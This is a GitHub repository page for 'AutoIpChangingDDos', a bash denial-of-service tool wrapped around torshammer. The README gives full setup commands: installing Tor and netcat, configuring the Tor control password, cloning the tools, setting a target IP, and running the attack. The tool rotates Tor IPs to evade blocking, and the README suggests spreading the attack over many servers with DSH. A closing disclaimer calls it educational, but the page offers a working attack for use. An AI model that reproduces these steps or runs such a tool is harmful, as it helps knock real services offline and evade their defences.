Skip to content

DDos Bash Script written around torshammer with an automatic IP changer to avoid IP blocking durring attack

License

Notifications You must be signed in to change notification settings

Y0urN3w0wn3r/AutoIpChangingDDos

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 

Repository files navigation

AutoIpChangingDDos

DDos Bash Script written around torshammer with an automatic IP changer to avoid IP blocking durring attack

HOW TO USE

First install torshammer on your server that is running Debian 9


sudo apt-get update -y && sudo apt-get install tor netcat screen git -y && systemctl enable tor && service tor start
Then generate a password hash used in your torrc file located at
/etc/tor/torrc

tor --hash-password "password"
Then add it to line number 59 in /etc/tor/torrc example
admin@vps:~# tor --hash-password "password" 16:D2DAF2F6F4419C9660155C7AED45177492363345A981CCCCB3659172F5

In Your torrc file it should look like:
#HashedControlPassword 16:D2DAF2F6F4419C9660155C7AED45177492363345A981CCCCB3659172F5

At this point you want to install torshammer by running

git clone https://github.com/dotfighter/torshammer

Then go into the folder torshammer and mv everything into the root folder
cd torshammer && mv * .. && cd ..

At this point clone this repo but move the script to the root folder also
git clone https://github.com/Y0urN3w0wn3r/AutoIpChangingDDos && cd AutoIpChangingDDos && cp * ..

Now you are ready to test your first target.
nano run.sh
Edit the IP address on line 34 to your targets ip you want to test and save it using CTRL+O then CTRL+X


Allow it to execute with the following command
sudo chmod +x run.sh
Run it with
./run.sh

You can use a distributed shell like "DSH" to make this a distributed attack by using multiple servers at one time.
To learn how to do that see this guide
HERE

DISCLAIMER: The information provided is for educational/testing purposes only and is not intended to be used on any service without first obtaining consent for testing. This attack is Illegal and can get you arrested if you use it on a service without permission. This is your only warning

About

DDos Bash Script written around torshammer with an automatic IP changer to avoid IP blocking durring attack

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages